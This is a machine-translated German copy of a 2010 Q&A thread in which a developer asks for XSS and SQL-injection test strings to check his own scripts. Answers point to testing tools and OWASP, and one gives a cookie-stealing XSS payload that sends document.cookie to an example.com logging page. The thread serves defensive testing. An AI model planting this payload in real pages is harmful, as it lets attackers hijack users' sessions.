1. Zuhause
  2. Frage und Antwort
  3. Kann mir jemand ein paar grundlegende XSS- und SQL-Injection-Skripte geben? (nicht, wie es scheint)

Kann mir jemand ein paar grundlegende XSS- und SQL-Injection-Skripte geben? (nicht, wie es scheint)

2010-05-08 12 views
10

Ich teste meine Skripte aus, um zu sehen, ob sie XSS- und SQL-Injektionen verhindern. Kann mir jemand ein paar einfache, aber gute Skripte zur Verfügung stellen, die in meine Programme "eindringen"? Ich möchte meine Skripts testen, bevor sie online gehen.Kann mir jemand ein paar grundlegende XSS- und SQL-Injection-Skripte geben? (nicht, wie es scheint)

EDIT: Vielen Dank für diese Links, sie enthalten viele und viele Informationen. Aber für einen Anfänger zur Sicherheit, gibt es eine empfohlene Seite? Ich bin mir nicht sicher, ob ich bereit bin, direkt in Sicherheitsfragen einzutauchen. Ich mag die Links waiwai933 empfohlen.

Quelle

2010-05-08 ggfan

Antwort

5

Jede Situation erfordert andere Skripts, so dass es keine "Einheitsgröße" gibt, die jemand anbieten könnte. Die Liste der Skripts, die getestet werden müssen, reicht in die Tausende, bevor Sie sicher sein können, dass Ihre Website sicher ist.

Sie können Firefox- oder Chrome-Plugins überprüfen, mit denen Sie SQL-Injektionen testen können. Ich schlage das vor, aber Sie können auch nach anderen suchen: https://addons.mozilla.org/en-US/firefox/addon/6727. Dadurch können Sie eine Liste von Injektionsskripten bereitstellen, die normalerweise nur einige wenige enthält. Sobald Sie sie aktivieren, bombardiert sie Ihre Site mit diesen Skripts und zeigt Ihnen, wo die Sicherheitsanfälligkeiten liegen.

schlage ich diese Seite für einige Beispiel XSS-Skripte: http://ha.ckers.org/xss.html

Quelle

2010-05-08 02:47:15 waiwai933

+0

danke! Kannst du kurz beschreiben, was das Addon macht? – ggfan

+0

zur Website gehen und die Beschreibung lesen? – Galen

+0

+1 für den letzten Link – chelmertz

1

Die einfachste eine, die nicht von den Browsern blockiert bekommt und kann leicht passieren, wenn Sie nicht tun strip_tags() ist der folgende Code:

<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>

Quelle

2010-05-08 02:50:54

+0

Für den Rekord ist 'nasty.com' eine ausländische Pornoseite. Ich sag bloß'. – mattbasta

1

Googes neue jarslberg Instruktionsseite ist eine großartige Quelle, um Ihnen beizubringen, wie Sie gegen XSS und verschiedene andere Sicherheitsangriffe schreiben und sich verteidigen.

Quelle

2010-05-08 02:51:50

1

+1 für die Pflege und Wissen genug zu fragen. Da Sie Sicherheitsfragen stellen möchten, empfehle ich Ihnen die OWASP Website, falls Sie noch nicht vertraut sind. Sie werden alle möglichen Informationen finden, die über das hinausgehen, was Sie gefragt haben. Ganz zu schweigen von jeder Menge Informationen über die Verhinderung aller Arten von Angriffen. Die Website ist ein unschätzbares Werkzeug für Web-Entwickler.

Quelle

2010-05-08 02:58:35 David

+0

danke! Ill Blick in die Website – ggfan

2

Das XSS Cheatsheet bei http://ha.ckers.org/xss.html ist eine gute Sammlung von XSS-Tests. Ich würde jedoch nicht empfehlen, einen eigenen XSS-Checker zu implementieren. es ist viel schwieriger als das Erkennen von SQL-Injektionen (wie Sie wahrscheinlich feststellen werden, wenn Sie einige Beispiele im Cheatsheet sehen). Die einzige solide Methode besteht darin, den Code zu analysieren, eine DOM-Struktur daraus zu erstellen und diese Struktur wieder in HTML umzuwandeln, und das ist eine Menge Arbeit, und andere Leute haben es bereits getan. Verwenden Sie etwas wie HTML Purifier.

Quelle

2010-05-08 11:18:02 Tgr

0

Sie können versuchen, mit Acunetix Security Scanner, wird es nicht nur für XSS und MySQL Injektion standardmäßig scannen, aber auch für andere Arten von Exploits. Das Programm emuliert praktisch einen Browser und kann sich wie ein eingeloggter Benutzer verhalten.

Quelle

2010-05-08 11:31:20 Kemo

 Verwandte Themen

  • Keine verwandten Themen^_^